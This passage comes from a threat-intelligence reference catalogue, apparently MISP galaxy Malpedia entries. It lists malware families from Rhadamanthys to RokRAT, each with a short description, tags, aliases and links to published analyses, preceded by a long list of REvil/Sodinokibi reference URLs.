https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/

https://www.fbi.gov/wanted/cyber/yevgyeniy-igoryevich-polyanin

https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-threatens-to-publish-data-of-automotive-group/

https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/

https://twitter.com/SyscallE/status/1411074271875670022

https://cocomelonc.github.io/malware/2023/02/02/malware-analysis-7.html

https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/

https://blag.nullteilerfrei.de/2020/02/02/defeating-sodinokibi-revil-string-obfuscation-in-ghidra/

https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf

https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20

https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/

https://www.bleepingcomputer.com/news/security/kaseyas-universal-revil-decryption-key-leaked-on-a-hacking-forum/

https://twitter.com/fwosar/status/1411281334870368260

https://www.br.de/nachrichten/deutschland-welt/mutmasslicher-ransomware-millionaer-identifiziert,Sn3iHgJ

https://diicot.ro/mass-media/3341-comunicat-de-presa-2-08-11-2021

https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/

https://www.certego.net/en/news/malware-tales-sodinokibi/

https://asec.ahnlab.com/ko/19860/

https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://www.kaseya.com/potential-attack-on-kaseya-vsa/

https://www.digitalshadows.com/blog-and-research/competitions-on-russian-language-cybercriminal-forums-sharing-expertise-or-threat-actor-showboating/

https://www.documentcloud.org/documents/21505031-hgsac-staff-report-americas-data-held-hostage-032422

https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html

https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-publishes-stolen-data-for-the-first-time/

https://news.sophos.com/en-us/2021/06/11/relentless-revil-revealed/

https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b

http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html

https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version

https://unit42.paloaltonetworks.com/revil-threat-actors/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks

https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/

https://unit42.paloaltonetworks.com/prometheus-ransomware/

https://www.flashpoint-intel.com/blog/revils-cryptobackdoor-con-ransomware-groups-tactics-roil-affiliates-sparking-a-fallout/

https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/

https://storage.courtlistener.com/recap/gov.uscourts.txnd.351760/gov.uscourts.txnd.351760.1.0_3.pdf

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.splunk.com/en_us/blog/security/kaseya-sera-what-revil-shall-encrypt-shall-encrypt.html

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://hatching.io/blog/ransomware-part2

https://public.intel471.com/blog/revil-ransomware-interview-russian-osint-100-million/

https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-to-stop-taking-bitcoin-to-hide-money-trail/

https://www.pandasecurity.com/emailhtml/2007-CAM-RANSOMWARE-AD360-WG/2006-Report-Sodinokibi-EN.pdf

https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40

https://teamt5.org/tw/posts/revil-dll-sideloading-technique-used-by-other-hackers/

https://www.connectwise.com/resources/revil-profile

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/

https://www.youtube.com/watch?v=tZVFMVm5GAk

https://www.nytimes.com/2019/08/22/us/ransomware-attacks-hacking.html

https://www.kpn.com/security-blogs/Tracking-REvil.htm

https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/

https://twitter.com/LloydLabs/status/1411098844209819648

https://analyst1.com/file-assets/History-of-REvil.pdf

https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/

https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://twitter.com/Jacob_Pimental/status/1398356030489251842?s=20

https://threatpost.com/ransomware-revil-sites-disappears/167745/

https://www.cybereason.com/blog/cybereason-vs-revil-ransomware-the-kaseya-chronicles

https://asec.ahnlab.com/ko/19640/

https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/

https://www.domaintools.com/resources/blog/revealing-revil-ransomware-with-domaintools-and-maltego

https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html

https://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html

https://www.bbc.com/news/technology-59297187

https://blogs.blackberry.com/en/2021/11/revil-under-the-microscope

https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://www.ironnet.com/blog/ransomware-graphic-blog

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti

https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html

https://www.acronis.com/en-sg/articles/sodinokibi-ransomware/

https://www.bleepingcomputer.com/news/security/kaseya-obtains-universal-decryptor-for-revil-ransomware-victims/

https://www.zscaler.com/blogs/security-research/kaseya-supply-chain-ransomware-attack-technical-analysis-revil-payload

https://www.elastic.co/blog/elastic-security-prevents-100-percent-of-revil-ransomware-samples?utm_content=&utm_medium=social&utm_source=twitter

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2022-05-01-revil-reborn-ransom.vk.cfg.txt

https://www.bleepingcomputer.com/news/security/revil-ransomwares-servers-mysteriously-come-back-online/

https://www.cyjax.com/2021/07/09/revilevolution/

https://www.bleepingcomputer.com/news/security/another-ransomware-will-now-publish-victims-data-if-not-paid/

https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/

https://www.europol.europa.eu/newsroom/news/five-affiliates-to-sodinokibi/revil-unplugged

https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf

https://threatintel.blog/OPBlueRaven-Part1/

https://www.bleepingcomputer.com/news/security/revil-ransomware-devs-added-a-backdoor-to-cheat-affiliates/

https://www.goggleheadedhacker.com/blog/post/reversing-crypto-functions

https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/

https://www.bleepingcomputer.com/news/security/revil-ransomware-returns-new-malware-sample-confirms-gang-is-back/

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/

https://securityscorecard.com/research/a-detailed-analysis-of-the-last-version-of-revil-ransomware

https://www.netskope.com/blog/netskope-threat-coverage-revil

https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf

https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/

https://securelist.com/sodin-ransomware/91473/

https://www.cnbc.com/2021/04/23/axis-of-revil-inside-the-hacker-collective-taunting-apple.html

https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html

https://twitter.com/alex_il/status/1412403420217159694

https://www.secureworks.com/blog/revil-development-adds-confidence-about-gold-southfield-reemergence?linkId=164334801

https://www.bleepingcomputer.com/news/security/ransomware-threatens-to-reveal-companys-dirty-secrets/

https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/

https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/

https://www.darktrace.com/en/blog/staying-ahead-of-r-evils-ransomware-as-a-service-business-model/

https://krebsonsecurity.com/2019/07/is-revil-the-new-gandcrab-ransomware/

https://storage.courtlistener.com/recap/gov.uscourts.txnd.352371/gov.uscourts.txnd.352371.1.0_1.pdf

https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/

https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling

https://medium.com/s2wlab/deep-analysis-of-revil-ransomware-written-in-korean-d1899c0e9317

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/kaseya-ransomware-supply-chain

https://awakesecurity.com/blog/threat-hunting-for-revil-ransomware/

https://blog.group-ib.com/REvil_RaaS

https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights

https://www.appgate.com/blog/electric-company-ransomware-attack-calls-for-14-million-in-ransom

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses

https://ke-la.com/ransomware-gangs-are-starting-to-look-like-oceans-11/

https://blog.truesec.com/2021/07/06/kaseya-vsa-zero-day-exploit

https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html

https://searchsecurity.techtarget.com/feature/Ransomware-negotiations-An-inside-look-at-the-process

https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

https://twitter.com/VK_Intel/status/1411066870350942213

https://www.bankinfosecurity.com/interviews/ransomware-files-episode-6-kaseya-revil-i-5045

https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89

https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs

https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f

https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-may-tip-nasdaq-on-attacks-to-hurt-stock-prices/

https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/

https://www.advintel.io/post/storm-in-safe-haven-takeaways-from-russian-authorities-takedown-of-revil

https://www.secureworks.com/blog/revil-the-gandcrab-connection

https://isc.sans.edu/diary/27012

https://securityaffairs.co/wordpress/98694/malware/sodinokibi-kenneth-cole-data-breach.html

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/

https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.zdnet.com/article/revil-ransomware-gang-launches-auction-site-to-sell-stolen-data/

https://blog.gigamon.com/2021/07/08/observations-and-recommendations-from-the-ongoing-revil-kaseya-incident/

https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/

https://www.youtube.com/watch?v=l2P5CMH9TE0

https://tehtris.com/fr/peut-on-neutraliser-un-ransomware-lance-en-tant-que-system-sur-des-milliers-de-machines-en-meme-temps/

https://blag.nullteilerfrei.de/2019/11/09/api-hashing-why-and-how/

https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/

https://twitter.com/svch0st/status/1411537562380816384

https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/

https://www.trendmicro.com/en_us/research/21/a/sodinokibi-ransomware.html

https://blogs.blackberry.com/en/2021/05/threat-thursday-dr-revil-ransomware-strikes-again-employs-double-extortion-tactics

https://intel471.com/blog/changes-in-revil-ransomware-version-2-2

https://www.bleepingcomputer.com/news/security/a-look-inside-the-highly-profitable-sodinokibi-ransomware-business/

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/

https://ke-la.com/darknet-threat-actors-are-not-playing-games-with-the-gaming-industry/

https://www.youtube.com/watch?v=P8o6GItci5w

https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/

https://twitter.com/R3MRUM/status/1412064882623713283

https://dissectingmalwa.re/germanwipers-big-brother-gandgrabs-kid-sodinokibi.html

https://medium.com/@underthebreach/tracking-down-revils-lalartu-by-utilizing-multiple-osint-methods-2bf3a6c65a80

https://drive.google.com/file/d/1ph1E0onZ7TiNyG87k4WjofCKNuCafMLk/view

https://securelist.com/ransomware-world-in-2021/102169/

https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/

https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout

https://www.flashpoint-intel.com/blog/chatter-indicates-blackmatter-as-revil-successor/

https://vimeo.com/449849549

https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/

https://ke-la.com/easy-way-in-5-ransomware-victims-had-their-pulse-secure-vpn-credentials-leaked/

https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion

https://www.crowdstrike.com/blog/how-crowdstrike-stops-revil-ransomware-from-kaseya-attack/

https://www.secureworks.com/research/lv-ransomware

https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/

https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel

https://www.bleepingcomputer.com/news/security/revil-gang-tries-to-extort-apple-threatens-to-sell-stolen-blueprints/

https://securityintelligence.com/posts/sodinokibi-revil-ransomware-disrupt-trade-secrets/

https://www.hsgac.senate.gov/media/minority-media/new-portman-report-demonstrates-threat-ransomware-presents-to-the-united-states

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-managedcom-hosting-provider-500k-ransom/

https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/undressing-the-revil/

https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf

https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-says-travelex-will-pay-one-way-or-another/

https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/

https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html

https://areteir.com/wp-content/uploads/2020/07/Arete_Insight_Sodino-Ransomware_June-2020.pdf

https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-travelex-demands-3-million/

https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/

https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus

https://www.bleepingcomputer.com/news/security/revils-tor-sites-come-alive-to-redirect-to-new-ransomware-operation/

https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/

https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/

https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/

https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/

https://www.fincen.gov/sites/default/files/advisory/2021-11-08/FinCEN%20Ransomware%20Advisory_FINAL_508_.pdf

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://news.sophos.com/en-us/2021/06/30/what-to-expect-when-youve-been-hit-with-revil-ransomware/

https://www.grahamcluley.com/travelex-paid-ransom/

https://www.secureworks.com/research/revil-sodinokibi-ransomware

https://unit42.paloaltonetworks.com/threat-brief-kaseya-vsa-ransomware-attacks/

https://www.justice.gov/opa/pr/sodinokibirevil-ransomware-defendant-extradited-united-states-and-arraigned-texas

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf

https://russian.rt.com/russia/article/926347-barnaulec-rozysk-fbr-kibermoshennichestvo

https://velzart.nl/blog/ransomeware/

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

https://community.riskiq.com/article/3315064b

https://www.bleepingcomputer.com/news/security/fbi-revil-cybergang-behind-the-jbs-ransomware-attack/

https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?blob=publicationFile&v=2

https://twitter.com/resecurity_com/status/1412662343796813827

https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/

https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/

https://www.advanced-intel.com/post/revil-vanishes-from-underground-infrastructure-down-support-staff-adverts-silent

https://www.flashpoint-intel.com/blog/revil-disappears-again/

https://www.bleepingcomputer.com/news/security/revil-ransomware-gangs-web-sites-mysteriously-shut-down/

https://www.flashpoint-intel.com/blog/interview-with-revil-affiliated-ransomware-contractor/

https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox

https://sites.temple.edu/care/ci-rw-attacks/

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf

https://www.youtube.com/watch?v=QYQQUUpU04s

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/

https://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain

https://ke-la.com/will-the-revils-story-finally-be-over/

https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://thehackernews.com/2022/03/ukrainian-hacker-linked-to-revil.html

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-1-000-plus-companies-in-msp-supply-chain-attack/

https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/

http://www.secureworks.com/research/threat-profiles/gold-southfield

https://www.bleepingcomputer.com/news/security/new-jersey-synagogue-suffers-sodinokibi-ransomware-attack/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.secureworks.com/research/threat-profiles/gold-southfield

https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html

https://www.tgsoft.it/english/news_archivio_eng.asp?id=1004

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

Rhadamanthys

According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.

At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.

The tag is: misp-galaxy:malpedia="Rhadamanthys"

Rhadamanthys is also known as:

Table 4447. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://outpost24.com/blog/rhadamanthys-malware-analysis/

https://www.accenture.com/us-en/blogs/security/information-stealer-malware-on-dark-web

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign

https://research.checkpoint.com/2023/rhadamanthys-the-everything-bagel-infostealer/

https://www.malware-traffic-analysis.net/2023/01/03/index.html

https://www.zscaler.com/blogs/security-research/technical-analysis-rhadamanthys-obfuscation-techniques

https://threatmon.io/rhadamanthys-stealer-analysis-threatmon/

https://research.checkpoint.com/2023/from-hidden-bee-to-rhadamanthys-the-evolution-of-custom-executable-formats/

https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023

https://www.secureworks.com/research/the-growing-threat-from-infostealers

https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks

https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

Rhino

Ransomware.

The tag is: misp-galaxy:malpedia="Rhino"

Rhino is also known as:

Table 4448. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rhino

https://www.vmray.com/cyber-security-blog/rhino-ransomware-malware-analysis-spotlight/

RHttpCtrl

The tag is: misp-galaxy:malpedia="RHttpCtrl"

RHttpCtrl is also known as:

Table 4449. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rhttpctrl

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/

Rietspoof

Rietspoof is malware that mainly acts as a dropper and downloader, however, it also sports bot capabilities and appears to be in active development.

The tag is: misp-galaxy:malpedia="Rietspoof"

Rietspoof is also known as:

Table 4451. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rietspoof

https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-spoofing-reeds-rietspoof/

https://blog.avast.com/rietspoof-malware-increases-activity

https://decoded.avast.io/threatintel/spoofing-in-the-reeds-with-rietspoof/

Rikamanu

The tag is: misp-galaxy:malpedia="Rikamanu"

Rikamanu is also known as:

Table 4453. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rikamanu

https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets

Rincux

The tag is: misp-galaxy:malpedia="Rincux"

Rincux is also known as:

Table 4454. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rincux

https://www.virusbulletin.com/uploads/pdf/conference_slides/2011/Edwards-Nazario-VB2011.pdf

RisePro

RisePro is a stealer that is spread through downloaders like win.privateloader. Once executed on a system, the malware can steal credit card information, passwords, and personal data.

The tag is: misp-galaxy:malpedia="RisePro"

RisePro is also known as:

Table 4456. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.risepro

https://any.run/cybersecurity-blog/risepro-malware-communication-analysis/

https://embee-research.ghost.io/identifying-risepro-panels-using-censys/

https://blog.sekoia.io/new-risepro-stealer-distributed-by-the-prominent-privateloader/

RM3

Created from the codebase of Gozi/ISFB.

The tag is: misp-galaxy:malpedia="RM3"

RM3 is also known as:

Table 4458. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rm3

https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/

https://twitter.com/URSNIFleak

RoarBAT

According to SOCRadar, this is a batch script that uses WinRAR to delete files with target file extensions from a disk.

The tag is: misp-galaxy:malpedia="RoarBAT"

RoarBAT is also known as:

Table 4460. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.roar_bat

https://socradar.io/sandworm-attackers-use-winrar-to-wipe-data-from-government-devices/

RobinHood

The tag is: misp-galaxy:malpedia="RobinHood"

RobinHood is also known as:

  • RobbinHood

Table 4461. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.robinhood

https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/

https://www.bleepingcomputer.com/news/security/a-closer-look-at-the-robbinhood-ransomware/

https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

https://blogs.quickheal.com/a-new-ransomware-goodwill-hacks-the-victims-for-charity-read-more-to-know-more-about-this-ransomware-and-how-it-affects-its-victims/

https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf

https://arstechnica.com/information-technology/2019/05/baltimore-city-government-hit-by-robbinhood-ransomware/

https://www.bleepingcomputer.com/news/security/ransomware-exploits-gigabyte-driver-to-kill-av-processes/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/

https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/

https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/

https://twitter.com/VK_Intel/status/1121440931759128576

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://www.sentinelone.com/blog/robinhood-ransomware-coolmaker-function-not-cool/

https://krebsonsecurity.com/2019/06/report-no-eternal-blue-exploit-found-in-baltimore-city-ransomware/

https://goggleheadedhacker.com/blog/post/12

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

rock

The tag is: misp-galaxy:malpedia="rock"

rock is also known as:

  • yellowalbatross

Table 4462. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rock

Rofin

The tag is: misp-galaxy:malpedia="Rofin"

Rofin is also known as:

Table 4464. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rofin

Rokku

The tag is: misp-galaxy:malpedia="Rokku"

Rokku is also known as:

Table 4466. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku

https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/

RokRAT

It is a backdoor commonly distributed as an encoded binary file downloaded and decrypted by shellcode following the exploitation of weaponized documents. DOGCALL is capable of capturing screenshots, logging keystrokes, evading analysis with anti-virtual machine detections, and leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex.

The tag is: misp-galaxy:malpedia="RokRAT"

RokRAT is also known as:

  • DOGCALL

Table 4467. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat

https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/

http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html

https://github.com/ssp4rk/slides/blob/master/2019SAS_Behind_of_the_Mask_of_ScarCruft.pdf

https://medium.com/s2wlab/matryoshka-variant-of-rokrat-apt37-scarcruft-69774ea7bf48

http://v3lo.tistory.com/24

https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf

https://threatmon.io/reverse-engineering-rokrat-a-closer-look-at-apt37s-onedrive-based-attack-vector/

https://www.ibm.com/downloads/cas/Z81AVOY7

https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/

https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf

https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

https://asec.ahnlab.com/en/51751/

http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html

https://twitter.com/ESETresearch/status/1575103839115804672

https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/

